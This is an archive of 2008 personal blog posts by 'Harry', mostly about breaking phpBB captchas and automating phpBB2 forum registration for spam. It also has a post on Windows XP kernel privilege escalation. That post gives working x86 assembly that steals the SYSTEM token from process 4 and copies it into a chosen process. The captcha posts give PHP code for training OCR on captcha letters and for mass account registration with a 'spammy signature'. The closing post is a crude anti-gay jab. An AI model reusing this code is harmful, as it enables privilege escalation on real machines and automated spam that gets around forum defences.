PHPBB3 Captcha is super easy

PHPbb3 Captcha 2

A while back I presented a long-winded algorithm that would crack phpBB3 captchas. However I cracked it a while back and it’s even simpler than I said before. My floodfill routine returns the size of the area it colours in. Soooo… I flood fill background coloured pixels and if it’s a small area we assume it must be part of a letter and keep it. That gives us lots of small segments to join together.

Incidentally we find the background colour by reading the pixels along the top and finding the most regularly occuring colour.

Now we have some small segments we make them touch each other by blurring them and then we force the picture into only two colours. Then using the average density of vertical lines in each letter we rotate them to an approximately correct position. It may throw a few upside down but as long as that letter always comes out that way up the computer doesn’t care.

Now just train Gocr or a neural network or <<insert cunning program here>> to read those letters. Simple. And surprisingly accurate too. We could further improve it with colour checking routines etc but hey, it works.

May 12th, 2008, posted by Harry

Google Trips Out

This is totally pointless, but I wasn’t aware that this was actually possible until today.

Google Trips Out

If it looks normal for you then I guess it didn’t work.

May 7th, 2008, posted by Harry

Windows XP Ring 0 Kernel Mode Hacking

So you’ve found a vulnerability in Windows XP that drops you into kernel mode and there you are thinking hehehehe (this is an evil laugh) I can do whatever I want. The only issue is you call win32 function after win32 function only to realise that in ring 0 kernel mode you can’t do dick. After the tenth reset of your PC you realise that you have to be in ring 3 to actually run any proper code. So you play around and you find out that you can modify memory and change a few strings. Ohhhh, the power! You can change some strings. This is pointless.

You read up on some kernel mode functions and you find out that the SYSENTER and SYSCALL commands can be used to enter some kernel functions that will give you basic disk access. However if you use the wrong command on the wrong processor it will probably crash. It’s a start but it’s a heck of a lot of code checking for the correct processor type and then actually to get it to do anything useful. You can’t just access files in the normal way and you can bet if we try and allocate some heap memory it will… crash… again. And then you think yep, of course it will, heap memory allocation is carried out by win32 api functions which run in ring 3 user mode. Fuck it!

So here’s the answer. It took me ages to find this and get it to compile. At fs:[0×124] in windows xp there just so happens to be an array. I forget exactly how it’s laid out but it has all the processes running in it along with… the user running the process. By default there is normally two users at least. SYSTEM and the current running user. SYSTEM has full access to everything. I like the sound of that. Now process number ID 4 in windows xp is always running as SYSTEM. As long as we know the process ID of a process we would like to run as SYSTEM we can just copy the user ID token into our preferred process. Here it goes, my compiler wouldn’t accept all the comments, and I’ve had to put them back…:

pushad

; get the start of the structure into eax
mov eax,dword ptr fs:[0×124]
mov eax,[eax+0×44]
push eax

s1:
mov eax,[eax+0×88]
sub eax,0×88
; Process ID 4 has the SYSTEM privilege token
cmp [eax+0×84],4
; if this process isn’t ID 4 check the next one
jne s1

; rip out the SYSTEM token
mov edi,[eax+0xC8]
and edi,0xfffffff8

; this assumes we are running a c program with a integer called elevpid
mov ebx, _elevpid

s2:
; keep moving down the process list
mov eax,[eax+0×88]
sub eax,0×88
; this is our process id we want to be SYSTEM
cmp [eax+0×84],ebx
jne s2

; copy the user token into our own process
mov [eax+0xC8],edi

pop eax

popad

Oh yeah and don’t enter the wrong process ID into this. It will keep scanning through memory until it runs out of memory to scan. And ring 0 is really not a place you want to get stuck in an infinite loop.

April 29th, 2008, posted by Harry

PHP GTK 2

Last time I said I would be writing a Java application. My idea was take some of these php scripts and group them into something that is easier to use for beginners that runs on the desktop.

However… I got to thinking. I said PHP is a powerful language, and is the only language you really need to write some truly powerful applications. So I’m going to write a PHP application that runs not from a web server or the command line but starts up a proper window.

OK, so lets get to this. You need:

Glade (to design the window)
GTK+ windows runtimes (unless you run Linux)
PHP 5 with php_gtk2 extension
My PHP GTK scripts (extract them into the same directory as the php 5 install and then double click start.bat)

You got all those? OK fire up glade and create a window that is to your liking. Like mine below. It will save as something.glade which will be some XML for creating the window.

PHP GTK2 App

Now this is the PHP to create a window… I call it glade_win.php

<?php

// load php gtk2 in
if (!extension_loaded(’php_gtk’)) {
if (strtoupper(substr(PHP_OS, 0, 3)) === ‘WIN’) {
dl(’php_gtk2.dll’);
} else {
dl(’php_gtk2.so’);
}
}

// load the window from our glade .xml file
$glade =& new GladeXML( dirname( __FILE__) . “/wndMain.glade”);

// make sure the window closes when we click close
$glade->get_widget(’wndMain’)->connect_simple(’destroy’, array(’Gtk’, ‘main_quit’));

// execute the gtk main function
gtk::main();

?>

This couldn’t be any more simple. The first bit is necessary to load the DLL in because when it runs on my Linux install it destroys my web server if it has php_gtk2 turned on by default.

The next part creates an object that loads in the XML. We then connect the close button i.e. the cross at the top right hand corner to a quit routine, and then gtk::main(); runs the necessary code to view the window.

My window XML is in my scripts zip. It should give an idea of where I am going with this :D . Hopefully that all worked smoothly for you.

April 23rd, 2008, posted by Harry

Book List

Before I post my next post I’m going to make a little list of books which I think are amazing reading.

Persuasion
==========

I find this stuff amazing, there’s only one book I recommend but here’s why. It’s literally a study of the way people react under very similar situations with perhaps a small change to the way you phrase something, with statistics on the differing reactions of groups of people to the new phrase. For instance foot in the door technique is the process of making a small request such as to sign a piece of paper to show they support they would support the local blood bank, and then asking if they would now be intereted in donating blood. On average it is likely to increase the response rate by around 10% to asking the second question only. This is the type of thing this book is about.

Sales/Marketing
===============

I think learning this stuff is essential if you’re doing anything PPC or generally advertisement related. And it’s also extremely interesting.

I recommend this book for the simple reason that the guy who wrote it sold over 20 million pairs of blublocker sunglasses. He must know something about his trade. I’ve read some reviews on this book by people saying it’s only good for direct response. They’re right but PPC and the web is very similar to direct response marketing. Now you could walk into PPC or advertising totally blind without a clue what you’re doing and pick everything up as you go along but when you’re putting hundreds of dollars of your own money on the line you’ll admit that’s a little more than scary? In this book Joesph Sugarman writes about his experiences in producing effective sales copy which should give you a good grounding. Most of the reviews on this book praise it pretty highly.

Coding Techniques
=================

These are intense reading about very defined topics. You’re going to need a ton of caffeine but I’d be amazed if you don’t come away feeling like you’ve truly learned something. (At the moment there is only one in this section but I will probably add more :D )

Natural Language Processing is extremely interesting because it involves the computer attempting to give the impression of being able to talk as if it understood the world it is trying to describe. http://en.wikipedia.org/wiki/Natural_language_processing explains the basics of it. The fundamentals of natural language generation involve taking some basic information and forming a natural sounding sentence from it. To do this we can use statistics to analyze the probability of a word appearing after a word or set of words. There are markov classes on the Internet which use basic statistics to rewrite content. It’s a complicated subject by any stretch of the word.

PHP Newbies
===========

If you are new to coding I suggest you only learn one language, PHP. With PHP you will be able to do almost everything you will ever need to and you will be able to write powerful database applications on the web as well as write scripts that run on your own desktop. I think there is only one way to learn to code. Promise yourself to write a little script and work on it until you pull it off. A book is useful to grasp the basics and act as a reference so you don’t have to google every two minutes.

Social Engineering
==================

How to break through many impenetrable security systems with simple phone calls. Certainly makes you think. The whole of the book describes building trust with members staff by gaining different small pieces of information from different departments/staff until the product of that information supplies you with enough credibility that they will believe you are who you say you are. I don’t recommend or do any of this :D it’s just an interesting read.

Next post will be the Java thing.

April 17th, 2008, posted by Harry

Instant GOCR Training

A while back I said you *may* be able to train GOCR to recognise PHPBB2 captchas instantly thanks to its excellent database layout. Now for the moment of truth. Several hours later after travelling through much shrubbery with only my trusty whip and bent fedora for company (I think I may be insane but I don’t have the paper to prove it or the jacket)…

It works. The only downside is if you fill the database with too many characters it is very likely to slow GOCR down immensely. So go easy and possibly try and remove too many duplicates of the same letter.

So here’s how it works, inside the custom database directory is a file called db.lst. This file is literally just a list of pictures with their correct answer as seen below (note this is my custom database, normally it names the files sensible names :D ):

30402199be694d0330735cb3de4df778.pbm G
852f04abf55c904fdb977dc297c630ec.pbm Z
1cbc984624ca1673132afead5d6f518a.pbm G
297a35232ba803cd6675a38a29453828.pbm D

The first entry is the filename, and it can literally be any pbm/png file. The second entry is the correct letter. That simple. All we have to do is rip the letters out and put them in the same directory. Unfortunately I haven’t got the script cleaned in a nice easy to use format to just download, but I’ll post what I used to build my custom database very quickly. I use the retrieve.php include which is somewhere on this site. I should be more organised. I think it’s here.

Now this code is written to run on Windows/Linux so it uses png files because we can’t export pbm files from GD in php. It was either that or have the script not work in Windows at all. All you Linux folks can easily convert them to pbm files and do it the way it’s supposed to be done. (The script runs from the command line only… like this… “php script.php answer.txt captcha.png”) (Also I just thought… Make sure you have the directory ‘data’ in the same directory as you run the script. Don’t run the script from the ‘data’ directory but the directory just above it)

<?php

require_once(”retrieve.php”);

// extract the letters out
$letters = get_letter_array($argv[$argc-1]);

// get the answer to the captcha
$fp = fopen($argv[$argc-2], “r”) or die(”Need a solved answer in ” . $argv[$argc-2]);
$str_answer = fgets($fp);
fclose($fp);
$answer = str_split($str_answer);

// give them unique names and save them in .png format
$unique_name = array();
for($index=0; $index<count($letters); $index++)
{
$unique_name[] = md5(uniqid());
imagepng($letters[$index], “data/” . $unique_name[$index] . “.png”);
}

// link them from the db.lst file
$fp = fopen(”data/db.lst”, “a”);
for($index=0; $index<count($letters); $index++)
{
fwrite($fp, $unique_name[$index] . “.png ” . $answer[$index] . “\n”);
}
fclose($fp);

?>

And now for some link love to the spamhuntress.

I actually have a plan in mind for my next post, which is damn unusual. I’ll let you know how it goes in several days time :D . Oh yeah and it’ll be in Java so it’ll run nicely on your Windows install too.

April 16th, 2008, posted by Harry

An idea I once had

I don’t have the skills to set this up myself as it’s a large project and I don’t know how you’d go about setting up an opensource project on this scale. However.

Have you ever used the ALICE bot? I think it’s pretty amazing yet ridiculously simple. Literally anyone who knows basic English can make his own. And that’s my idea. A website like wikipedia based on user input that is moderated so that people all work together putting in a little time to make many different personality bots for a game. Then we get some open source coders to add the finishing touches to the game like the GUI. Sure it might not make money but hopefully it’d push the boundaries of games in the future. I don’t know. Good idea?

April 12th, 2008, posted by Harry

Forum registration

I get a message in my comments:

“BTW? have you got the rest of the scripts you need to use your captcha breaking code? i.e. the forum spam stuff?”

Don’t think I’m not listening :D . So here we go, a script that will register at a phpBB2 forum. It works automatically for Linux if you run it from the command line. I know half of you probably use Windows but it’s such a pain trying to port code and the necessary code is in my guest post on BlueHatSeo.com.

The workings behind the functions are stored in regfunctions.php, and you use the script by either running “php regphpbb2.php” or navigating to it in your browser if you’re on Windows.

Anyway at the top of the code is our list of variables that we can change for registering at different forums.

<?php

require_once(”regfunctions.php”);

// set our sign up variables like username and so on
$sign_user = “user”;
$sign_email = “test@test.localhost”;
$sign_pass = “aaa”;
$sign_sig = “My spammy signature”;
$site_name = “http://localhost/phpBB2/”;

Now we download the captcha and if we’re running inside a browser we show the captcha to the user, otherwise we run our C program to crack it.

// make sure we haven’t already sent an answer to our captcha
if(!isset($_GET[’captchacode’]))
{
// begin to register an account this will save the captcha to downloadedcaptcha/captcha.png
// it will return a necessary session/confirm id we’ll need later
$ids = get_register_captcha($site_name);
$sid = $ids[0];
$cid = $ids[1];

// crack the captcha or get a human to solve it
if(!isset($_SERVER[’_']))
{
// if we are running in a web page show the captcha to the user
echo “<h2>PHPBB2 Captcha</h2> You can crack this automatically by running this script from the command line in Linux with ImageMagick libraries installed.<br />”;

echo “<img src=’downloadedcaptcha/captcha.png’ /><br />”;
echo “<FORM action=’” . $_SERVER[’PHP_SELF’] . “‘ method=’GET’>”;
echo “Type in the code <input type=’text’ size=’15′ name=’captchacode’ /><br />”;
echo “<input type=’hidden’ name=’sid’ value=’” . $sid . “‘ />”;
echo “<input type=’hidden’ name=’cid’ value=’” . $cid . “‘ />”;
echo “<input type=’submit’ value=’submit answer’ />”;
echo “</FORM>”;

exit(1);
}
else
{
// if we are running from the command line solve it in code
echo “Solving captcha…\n”;
$solved_captcha = str_replace(” “, “”, exec(”./cleanpic downloadedcaptcha/captcha.png”));
$solved_captcha = str_replace(”\n”, “”, $solved_captcha);
}
}

// if we have a solved captcha put it in the correct variable
if(isset($_GET[’captchacode’]))
{
$solved_captcha = $_GET[’captchacode’];
$sid = $_GET[’sid’];
$cid = $_GET[’cid’];
}

The important bit here is the $solved_captcha = exec(”./cleanpic… ) part. exec allows us to run a program and return the value, in this case our cracked captcha. You need to replace this program to it’s windows version if you are running windows. The str_replace around the call to exec is just to clean the string up in case it sends back a string with spaces or carriage returns. Now we just send some post variables to the server with all the necessary data

// finish the sign up
$success = sign_up($sid, $cid, $solved_captcha, $site_name, $sign_user, $sign_email, $sign_pass, $sign_sig);

if($success)
echo “account created\n”;
else
echo “account failed to be created\n”;

// now verify the email, note: this is a stub, no code in it
// gotta write it yourself :D
verify_email();

?>

I haven’t written in the email verification code but you don’t always need it for phpBB2. It’s dependent on the mail server you use anyway.

How do you work these scripts out? I have a trick :D . LiveHTTP Headers for Firefox. Take a look below. I register first manually and it prints out everything I need to send to the server to register automatically next time.

LiveHTTP headers

The highlighted part (click to zoom in) is all the post variables that allow us to register. Just exchange them for our own variables. From here it’s pretty simple to add on the pieces that post messages on the forum.

Forum Registration Code

April 11th, 2008, posted by Harry

Letter Derotation

I’m getting kind of done with captchas but here goes another post on them. You may have read Slightly Shady SEO about how to derotate letters. Here’s my easier technique. Add up all the black in the vertical lines of the letter, find the average and then check for spikes above that average. These spikes are probably vertical lines in the letter like the back of a ‘d’ or a ‘p’ etc. Then we simply rotate it around by a few degrees until we find the rotation with the largest vertical spike above the average. We then need some extra checks for symettry and so on but that’s the basics.

April 5th, 2008, posted by Harry

OK Cool

U R Gay

April 2nd, 2008, posted by Harry